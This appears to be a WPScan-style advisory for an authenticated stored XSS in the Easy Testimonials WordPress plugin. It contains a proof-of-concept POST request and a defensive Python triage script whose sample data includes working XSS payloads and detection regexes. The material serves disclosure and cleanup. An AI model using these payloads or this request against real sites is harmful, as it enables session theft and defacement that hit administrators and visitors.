wpvulndb | Ngo Van Thien | WPVDB-ID: 72252A15-98DE-44DC-A62B-9F2571D076AD
History: May 13, 2020 - 12:00 a.m.

Easy Testimonials < 3.6 - Authenticated Stored Cross-Site Scripting (XSS)

2020-05-13 00:00:00 | Ngo Van Thien | wpscan.com

EPSS: 0.001 (Low) | Percentile: 31.3%

Multiple stored cross-site scripting vulnerabilities in Easy Testimonials 3.5.2 and lower allow an authenticated user to inject arbitrary web script or HTML via the Client Name, Position / Web Address / Other, Location Reviewed / Product Reviewed / Item Reviewed and Rating parameters of a testimonial. A medium-privileged user (Contributor or above) can store arbitrary JavaScript that executes when an administrator or any other user opens the All Testimonials page in the backend. Furthermore, if the "Allow HTML Tags in Testimonials" option is enabled (which is the default), the XSS is also triggered when the testimonial is rendered on the frontend, where unauthenticated visitors see it.

Timeline (WPScanTeam)

May 9th, 2020 - Confirmed & Escalated to WP Plugins Team
May 11th, 2020 - WP Plugins Team Investigating
May 12th, 2020 - v3.6 released, fixing the issue

PoC

POST /wp-admin/post.php?post=176&action=edit&meta-box-loader=1&meta-box-loader-nonce=ee114d2173&_locale=user HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/post.php?post=176&action=edit
X-WP-Nonce: c12330b50c
Content-Type: multipart/form-data; boundary=---------------------------1097171016543246544154165286
Origin: http://example.com
Content-Length: 2729
DNT: 1
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7Ce020133190b2d0d55659fc79576f7341774c77f301b6096023e70f294549d103; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7C8642c6873c0009beb211174d3e93ed720f7d9826d71438fc48ac16ea7e999a66; wp-settings-3=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt; wp-settings-time-3=1588910767

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wpnonce"

c627da8fa4
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/post.php?post=176&action=edit
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="user_ID"

3
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="action"

editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="originalaction"

editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_type"

testimonial
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="original_post_status"

publish
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="referredby"

http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_original_http_referer"

http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_ID"

176
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="meta-box-order-nonce"

e78bbacfea
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="closedpostboxesnonce"

cb99c6138d
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="samplepermalinknonce"

97e0ac6960
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="my-custom-fields_wpnonce"

f842632466
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_client"

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_email"

[email protected]
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_position"

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_other"

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_rating"

-----------------------------1097171016543246544154165286--

XSS trigger point: the stored payload fires when an administrator or other authenticated user loads the All Testimonials list in the backend.
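Updating to 3.6 stops new payloads from being stored but does nothing about testimonials that were edited while the site was vulnerable. The following Python triage script is an added example, not code from the advisory or from the Easy Testimonials plugin: it scans an export of wp_postmeta rows for script-capable HTML in the affected fields. It assumes the form fields map to the `_ikcf_client`, `_ikcf_position`, `_ikcf_other` and `_ikcf_rating` meta keys as the PoC request above suggests, that rows were exported with the standard wp_postmeta columns, and the sample rows it runs on are constructed for the demonstration.

```python
"""Triage scan for stored XSS payloads in Easy Testimonials meta fields.

Added example; not code from the WPScan advisory or from the plugin.
Assumptions: the vulnerable fields live in wp_postmeta under the meta keys seen
in the PoC request, and rows were exported as (meta_id, post_id, meta_key,
meta_value) tuples, e.g. with
    SELECT meta_id, post_id, meta_key, meta_value FROM wp_postmeta
    WHERE meta_key IN ('_ikcf_client','_ikcf_position','_ikcf_other','_ikcf_rating');
SAMPLE_ROWS below are constructed.
"""
import re

AFFECTED_KEYS = ("_ikcf_client", "_ikcf_position", "_ikcf_other", "_ikcf_rating")

# Checks run on the raw stored value. A value stored as "&lt;script&gt;" was
# escaped on input and renders as text even when echoed unescaped, so the
# value is deliberately not entity-decoded before matching.
CHECKS = (
    ("script tag", re.compile(r"<\s*script\b", re.I)),
    ("active embed tag", re.compile(r"<\s*(iframe|object|embed|svg|math)\b", re.I)),
    ("event handler attribute", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript: URL", re.compile(r"javascript\s*:", re.I)),
    ("tag with src attribute", re.compile(r"<\s*[a-z][^>]*\bsrc\s*=", re.I)),
)
# The rating is numeric by design; anything else is attacker-controlled text.
RATING_OK = re.compile(r"^\s*(\d+(\.\d+)?)?\s*$")


def reasons_for(meta_key, value):
    """Return why a stored value looks like an XSS payload ([] if it looks benign)."""
    reasons = [label for label, rx in CHECKS if rx.search(value)]
    if meta_key == "_ikcf_rating" and not RATING_OK.match(value):
        reasons.append("non-numeric rating")
    return reasons


def scan_rows(rows, keys=AFFECTED_KEYS):
    """Flag suspicious rows; keys=None scans every meta key in the export."""
    findings = []
    for meta_id, post_id, meta_key, meta_value in rows:
        if keys is not None and meta_key not in keys:
            continue
        reasons = reasons_for(meta_key, meta_value or "")
        if reasons:
            findings.append({"meta_id": meta_id, "post_id": post_id,
                             "meta_key": meta_key, "reasons": reasons})
    return findings


def affected_posts(findings):
    """Testimonial post IDs to quarantine (unpublish first, then clean the meta)."""
    return sorted({f["post_id"] for f in findings})


# Constructed sample export: post 176 is benign, 177 carries two payloads,
# 178 holds an entity-escaped string plus a key outside the advisory's scope.
SAMPLE_ROWS = [
    (101, 176, "_ikcf_client", "Jane Doe"),
    (102, 176, "_ikcf_position", "CTO, Example Ltd"),
    (103, 176, "_ikcf_rating", "5"),
    (104, 177, "_ikcf_client", "<img src=x onerror=alert(document.domain)>"),
    (105, 177, "_ikcf_other", "https://example.com"),
    (106, 177, "_ikcf_rating", '"><script>alert(1)</script>'),
    (107, 178, "_ikcf_client", "Bob &lt;script&gt; fan"),
    (108, 178, "_some_other_key", "<script>not in scope</script>"),
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f"post {f['post_id']} {f['meta_key']}: {', '.join(f['reasons'])}")
    print("quarantine:", affected_posts(scan_rows(SAMPLE_ROWS)))
```

Because the frontend also renders these fields when "Allow HTML Tags in Testimonials" is on, treat every flagged post as live until it is unpublished; the regexes are a triage filter, not a sanitizer, so review flagged values by hand rather than bulk-stripping tags.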

CPE
Name                Operator   Version
easy-testimonials   lt         3.6

